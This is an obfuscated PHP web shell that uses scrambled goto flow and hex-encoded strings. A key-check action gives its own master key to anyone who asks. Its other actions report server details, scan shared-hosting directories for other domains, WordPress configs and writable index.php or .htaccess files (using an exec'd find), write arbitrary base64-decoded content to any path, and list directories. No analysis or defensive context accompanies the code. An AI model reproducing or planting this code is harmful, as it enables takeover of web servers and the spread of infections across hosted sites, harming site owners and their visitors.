<?php
 goto UhyEi; UhyEi: error_reporting(0); goto RKl7h; YnTHv: $MASTER_KEY = "\114\x53\103\x5f" . substr(md5(__FILE__ . "\154\141\164\145\x72\141\154\55\62\x30\62\x36"), 0, 24); goto vKh1f; z9RYg: $action = isset($_REQUEST["\x61\x63\164\x69\x6f\156"]) ? $_REQUEST["\141\143\164\x69\157\156"] : ''; goto YnTHv; vKh1f: if ($action === "\x67\145\164\x5f\x6d\x61\x73\164\145\x72\137\153\x65\x79") { echo json_encode(array("\x6d\141\163\164\145\162\x5f\153\x65\x79" => $MASTER_KEY)); die; } goto jVUrZ; RKl7h: header("\103\x6f\x6e\x74\145\x6e\x74\x2d\124\x79\160\x65\72\x20\141\160\x70\154\151\143\x61\x74\x69\x6f\156\57\152\x73\157\156"); goto amg_0; jVUrZ: if ($key !== $MASTER_KEY) { echo json_encode(array("\x65\x72\162\x6f\x72" => "\x69\x6e\x76\x61\154\151\144\x20\x6b\145\x79")); die; } goto ejntC; amg_0: $key = isset($_REQUEST["\153\145\x79"]) ? $_REQUEST["\x6b\x65\x79"] : ''; goto z9RYg; ejntC: switch ($action) { case "\151\156\146\x6f": echo json_encode(array("\x70\150\160" => phpversion(), "\165\163\x65\162" => get_current_user(), "\x63\167\x64" => getcwd(), "\144\x6f\x63\x72\x6f\x6f\164" => isset($_SERVER["\104\117\x43\125\115\105\x4e\x54\x5f\x52\117\x4f\124"]) ? $_SERVER["\104\117\x43\x55\115\x45\116\x54\137\x52\117\117\x54"] : getcwd(), "\157\x73" => php_uname(), "\x73\x63\x72\151\160\x74" => __FILE__)); break; case "\x73\143\141\x6e": $results = array("\141\154\154\x5f\144\x6f\155\x61\151\x6e\163" => array(), "\x77\x72\x69\x74\x61\142\x6c\145\137\x64\x6f\x6d\141\x69\156\x73" => array(), "\x73\145\x72\x76\x65\162\x5f\151\x6e\146\x6f" => array("\x64\x6f\x63\165\155\x65\x6e\164\x5f\x72\x6f\157\164" => isset($_SERVER["\104\x4f\x43\x55\115\105\116\124\x5f\122\117\117\124"]) ? $_SERVER["\x44\x4f\x43\125\x4d\x45\x4e\124\137\x52\117\x4f\124"] : getcwd(), "\143\165\x72\162\x65\x6e\164\137\165\163\145\x72" => get_current_user(), "\x73\143\141\x6e\x5f\x74\x69\x6d\145" => date("\x59\55\155\x2d\x64\x20\x48\72\151\x3a\x73"), "\163\143\x61\x6e\x6e\x65\x64\x5f\x72\157\x6f\x74" => null)); $docRoot = isset($_SERVER["\x44\x4f\103\125\x4d\105\116\x54\137\x52\x4f\117\124"]) ? $_SERVER["\104\117\103\125\x4d\x45\116\124\x5f\122\x4f\117\x54"] : getcwd(); $roots = array(); if (preg_match("\43\x5e\x28\57\x68\x6f\155\x65\x2f\133\136\x2f\x5d\53\x2f\x70\165\142\154\x69\143\x5f\x68\164\155\x6c\x29\43", $docRoot, $m)) { $roots[] = $m[1]; } $parentOfDocroot = dirname($docRoot); if (is_dir($parentOfDocroot . "\x2f\160\165\x62\x6c\151\143\137\150\164\x6d\154")) { $roots[] = $parentOfDocroot . "\x2f\160\165\x62\x6c\151\143\137\x68\x74\x6d\154"; } if (preg_match("\43\x5e\50\57\150\x6f\155\145\x2f\x5b\x5e\57\135\x2b\51\57\43", $docRoot, $m)) { $userHome = $m[1]; if (is_dir($userHome . "\x2f\160\165\x62\154\x69\143\137\150\x74\155\154")) { $roots[] = $userHome . "\57\x70\165\142\x6c\x69\143\x5f\x68\164\155\154"; } if (is_dir($userHome . "\x2f\x64\157\155\141\x69\x6e\x73")) { $roots[] = $userHome . "\57\x64\x6f\x6d\x61\x69\156\163"; } if (is_dir($userHome . "\57\167\167\167")) { $roots[] = $userHome . "\57\167\167\167"; } $roots[] = $userHome; } if (preg_match("\x23\x5e\50\57\150\x6f\163\x74\x69\x6e\x67\x2f\x77\167\167\x7c\x2f\166\141\x72\57\167\167\167\174\57\x76\x61\162\57\x77\x77\x77\57\166\x68\x6f\x73\x74\163\x29\x2f\x23", $docRoot, $m)) { $roots[] = $m[1]; } $docParent = dirname($docRoot); if ($docParent && $docParent !== "\x2f" && $docParent !== $docRoot) { array_unshift($roots, $docParent); } $roots = array_merge($roots, array("\x2f\155\x6e\x74\x2f\167\167\167", "\57\x76\141\162\57\167\x77\x77", "\x2f\x68\x6f\x73\164\x69\156\147\x2f\x77\167\x77", "\x2f\150\x6f\155\145", "\x2f\x76\141\x72\57\x77\167\x77\x2f\166\150\x6f\163\164\x73", "\x2f\166\x61\162\x2f\x77\167\167\x2f\x68\164\x6d\x6c", dirname(dirname($docRoot)))); $roots = array_unique(array_filter($roots)); $domains = array(); $scannedRoot = null; $skip = array("\x2e", "\x2e\56", "\x62\x61\x63\x6b\x75\x70\x73", "\154\x6f\147\163", "\164\x6d\160", "\x63\x61\143\150\x65", "\x6c\x6f\x73\164\x2b\x66\157\x75\156\x64", "\x63\147\151\x2d\142\x69\x6e", "\x2e\x77\x65\x6c\154\55\153\x6e\157\x77\156", "\x77\x70\55\141\x64\x6d\151\156", "\167\160\55\x63\x6f\x6e\x74\x65\156\164", "\167\x70\55\151\x6e\x63\x6c\165\x64\x65\163"); foreach ($roots as $root) { if (!is_dir($root) || !is_readable($root)) { continue; } $items = @scandir($root); if (!$items) { continue; } $found = array(); foreach ($items as $item) { if (in_array($item, $skip)) { continue; } if ($item[0] === "\56") { continue; } $fp = $root . "\57" . $item; if (is_dir($fp)) { $found[] = array("\x6e\x61\x6d\x65" => $item, "\x70\x61\164\x68" => $fp); } } $hasDomains = false; foreach ($found as $f) { if (strpos($f["\x6e\141\x6d\x65"], "\56") !== false) { $hasDomains = true; break; } } if ($hasDomains) { if (!$scannedRoot) { $scannedRoot = $root; $domains = $found; } else { $domains = array_merge($domains, $found); } if (strpos($root, "\x70\165\142\154\151\143\x5f\x68\x74\x6d\154") !== false || strpos($root, "\144\157\x6d\141\151\156\x73") !== false) { break; } } } $seen = array(); $unique = array(); foreach ($domains as $d) { if (!isset($seen[$d["\x6e\141\x6d\145"]])) { $seen[$d["\x6e\141\155\x65"]] = true; $unique[] = $d; } } $domains = $unique; if (count($domains) < 2) { $wpConfigs = array(); $searchPaths = array(); if (preg_match("\43\x5e\50\57\x68\x6f\155\x65\x2f\x5b\136\57\x5d\53\51\57\x23", $docRoot, $hm)) { $searchPaths[] = $hm[1]; } $searchPaths[] = "\x2f\150\x6f\x6d\x65"; $searchPaths[] = "\57\166\x61\x72\x2f\167\167\167"; $searchPaths[] = "\x2f\166\x61\162\57\167\x77\167\x2f\x76\x68\x6f\x73\x74\163"; foreach ($searchPaths as $sp) { if (!is_dir($sp) || !is_readable($sp)) { continue; } $findResult = array(); @exec("\x66\x69\156\x64\x20" . escapeshellarg($sp) . "\40\x2d\x6d\x61\170\144\145\160\164\x68\40\65\x20\x2d\x6e\x61\155\145\x20\x27\167\x70\55\x63\157\x6e\x66\151\x67\x2e\x70\x68\160\47\x20\x2d\156\x6f\x74\x20\x2d\x70\141\164\150\x20\x27\52\x2f\x62\x61\x63\x6b\165\160\52\x27\40\x2d\156\x6f\164\40\x2d\x70\x61\x74\150\40\x27\52\57\143\141\143\150\x65\x2a\x27\40\62\76\x2f\x64\x65\166\57\156\x75\154\x6c\40\174\x20\150\x65\141\x64\40\x2d\65\60", $findResult); if (!empty($findResult)) { $wpConfigs = array_merge($wpConfigs, $findResult); break; } } $findDomains = array(); foreach ($wpConfigs as $configPath) { $webRoot = dirname($configPath); if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, "\x2f")) { continue; } $parts = explode("\x2f", trim($webRoot, "\x2f")); $domainName = null; foreach ($parts as $p) { if (strpos($p, "\56") !== false && !in_array($p, array("\x70\x75\x62\x6c\x69\x63\137\x68\164\x6d\154", "\x68\x74\164\x70\x64\x6f\143\x73", "\x77\167\x77")) && $p[0] !== "\56" && strlen($p) > 3) { $domainName = $p; } } if (!$domainName) { $last = end($parts); if (strlen($last) > 2 && $last !== "\x70\x75\x62\154\x69\x63\x5f\150\164\155\x6c" && $last !== "\x68\164\164\x70\144\157\143\163" && $last !== "\x68\x74\x6d\154") { $domainName = $last; } } if ($domainName && !isset($seen[$domainName])) { $seen[$domainName] = true; $domains[] = array("\x6e\141\x6d\145" => $domainName, "\160\x61\164\x68" => $webRoot, "\137\x77\x65\x62\x72\x6f\x6f\164" => $webRoot); $findDomains[] = $domainName; } } if (!empty($findDomains)) { $results["\163\145\x72\166\x65\x72\x5f\151\x6e\146\x6f"]["\146\x69\156\x64\x5f\x6d\x65\x74\x68\x6f\144"] = true; $results["\x73\145\x72\166\145\x72\137\x69\x6e\146\x6f"]["\x66\x69\156\x64\x5f\x63\x6f\165\x6e\x74"] = count($findDomains); if (!$scannedRoot) { $scannedRoot = "\146\x69\x6e\144"; } } } $results["\x73\x65\x72\166\145\162\x5f\x69\x6e\x66\157"]["\163\143\x61\156\x6e\x65\144\x5f\x72\157\x6f\164"] = $scannedRoot; foreach ($domains as $d) { if (!empty($d["\137\167\x65\x62\162\x6f\157\x74"])) { $webRoot = $d["\137\x77\145\x62\162\157\157\x74"]; } else { $webRoots = array($d["\x70\141\164\150"], $d["\160\x61\x74\x68"] . "\x2f\x70\165\x62\154\151\x63", $d["\x70\141\x74\150"] . "\57\x70\x75\x62\x6c\151\143\x5f\150\164\x6d\154", $d["\160\141\x74\x68"] . "\x2f\167\167\167", $d["\x70\141\x74\150"] . "\57\x68\164\164\x70\144\157\x63\163", $d["\160\141\x74\x68"] . "\57\167\x65\142"); $webRoot = null; foreach ($webRoots as $wr) { if (is_dir($wr) && (file_exists($wr . "\57\x69\x6e\144\x65\170\56\x70\150\x70") || file_exists($wr . "\x2f\x69\x6e\x64\x65\170\56\x68\x74\x6d\154"))) { $webRoot = $wr; break; } } if (!$webRoot) { foreach ($webRoots as $wr) { if (is_dir($wr) && is_readable($wr)) { $webRoot = $wr; break; } } } } $isWp = $webRoot && file_exists($webRoot . "\57\x77\x70\55\143\157\156\x66\x69\x67\x2e\160\x68\x70"); $indexWritable = $webRoot && file_exists($webRoot . "\x2f\151\x6e\144\x65\x78\x2e\x70\x68\x70") && is_writable($webRoot . "\x2f\x69\x6e\x64\x65\170\56\x70\x68\160"); $htaccessWritable = $webRoot && file_exists($webRoot . "\x2f\56\150\164\141\143\143\x65\x73\163") && is_writable($webRoot . "\x2f\x2e\150\x74\x61\x63\x63\x65\x73\163"); $dirWritable = $webRoot && is_writable($webRoot); $info = array("\144\x6f\155\x61\x69\156" => $d["\156\x61\x6d\145"], "\160\141\164\x68" => $d["\x70\x61\164\150"], "\x77\x65\x62\137\x72\157\157\164" => $webRoot, "\167\157\x72\144\160\162\x65\163\x73" => $isWp, "\x61\143\x63\x65\163\x73\151\x62\154\145" => is_readable($d["\160\x61\164\x68"])); $results["\x61\154\x6c\137\144\x6f\155\141\151\x6e\x73"][] = $info; if ($indexWritable || $htaccessWritable || $dirWritable) { $wInfo = array("\x64\x6f\155\x61\151\x6e" => $d["\156\x61\155\x65"], "\167\x65\142\x5f\x72\x6f\157\164" => $webRoot, "\x66\151\x6c\x65\163" => array()); if ($indexWritable) { $wInfo["\x66\151\154\145\x73"][] = array("\x74\171\160\145" => "\x69\x6e\x64\145\x78\x2e\x70\x68\160", "\160\141\164\x68" => $webRoot . "\57\151\156\144\x65\x78\x2e\x70\x68\x70"); } if ($htaccessWritable) { $wInfo["\146\x69\x6c\x65\163"][] = array("\x74\171\x70\x65" => "\x2e\150\x74\141\x63\x63\145\163\x73", "\160\x61\164\x68" => $webRoot . "\57\56\x68\164\141\x63\x63\145\163\x73"); } if ($dirWritable) { $wInfo["\146\x69\x6c\145\163"][] = array("\x74\171\x70\x65" => "\144\151\x72\x5f\x77\x72\151\x74\x61\x62\154\145", "\x70\141\x74\x68" => $webRoot); } $results["\167\162\x69\x74\141\142\x6c\x65\137\144\x6f\155\141\151\156\x73"][] = $wInfo; } } $results["\163\x65\x72\166\x65\x72\x5f\x69\x6e\x66\x6f"]["\x74\x6f\164\x61\x6c\x5f\146\x6f\x75\156\x64"] = count($results["\x61\154\154\x5f\144\x6f\155\141\151\156\163"]); $wpCount = 0; foreach ($results["\x61\154\154\x5f\x64\157\x6d\141\151\156\x73"] as $ad) { if ($ad["\167\x6f\162\144\160\x72\x65\x73\x73"]) { $wpCount++; } } $results["\x73\x75\x6d\x6d\141\x72\171"] = array("\x74\157\x74\x61\x6c\x5f\x64\x6f\155\x61\x69\156\x73" => count($results["\x61\154\x6c\x5f\144\x6f\x6d\141\151\x6e\x73"]), "\x77\x72\x69\164\141\142\x6c\145\x5f\x63\x6f\165\x6e\164" => count($results["\x77\162\151\x74\x61\x62\x6c\145\x5f\144\x6f\155\x61\151\x6e\x73"]), "\x77\x6f\162\144\x70\x72\x65\163\163\x5f\x63\x6f\x75\x6e\164" => $wpCount); echo json_encode($results); break; case "\167\x72\151\164\145": $path = isset($_REQUEST["\x70\x61\x74\150"]) ? $_REQUEST["\160\x61\x74\150"] : ''; $content = isset($_REQUEST["\x63\x6f\x6e\x74\x65\156\x74"]) ? $_REQUEST["\143\x6f\156\x74\x65\x6e\x74"] : ''; $isB64 = isset($_REQUEST["\x62\x61\163\x65\66\x34"]); if ($isB64) { $content = base64_decode($content); } $r = @file_put_contents($path, $content); if ($r === false) { echo json_encode(array("\145\162\162\157\x72" => "\167\x72\x69\164\145\40\x66\141\x69\154\x65\x64")); } else { echo json_encode(array("\163\165\x63\143\145\x73\163" => true, "\x70\x61\164\150" => $path, "\x73\151\172\145" => $r)); } break; case "\x6c\163": $path = isset($_REQUEST["\x70\x61\x74\150"]) ? $_REQUEST["\160\141\x74\150"] : getcwd(); if (!is_dir($path)) { echo json_encode(array("\145\x72\x72\x6f\x72" => "\156\157\164\40\x61\x20\144\151\162")); break; } $items = array(); foreach (scandir($path) as $f) { if ($f === "\56" || $f === "\x2e\56") { continue; } $fp = rtrim($path, "\x2f") . "\x2f" . $f; $items[] = array("\156\141\x6d\x65" => $f, "\164\x79\x70\145" => is_dir($fp) ? "\x64\x69\x72" : "\x66\x69\154\145", "\163\151\x7a\145" => is_file($fp) ? filesize($fp) : 0, "\167\x72\151\164\x61\x62\x6c\x65" => is_writable($fp)); } echo json_encode(array("\160\x61\164\x68" => $path, "\143\157\x75\156\x74" => count($items), "\151\164\x65\155\163" => $items)); break; default: echo json_encode(array("\145\x72\x72\157\162" => "\165\156\x6b\x6e\x6f\167\x6e\x20\x61\143\x74\x69\157\156", "\141\x63\x74\151\x6f\156\163" => "\147\145\x74\x5f\x6d\x61\163\164\x65\x72\137\153\145\x79\54\x20\x69\156\x66\157\54\x20\163\x63\141\x6e\x2c\40\167\x72\151\x74\145\54\x20\x6c\163")); }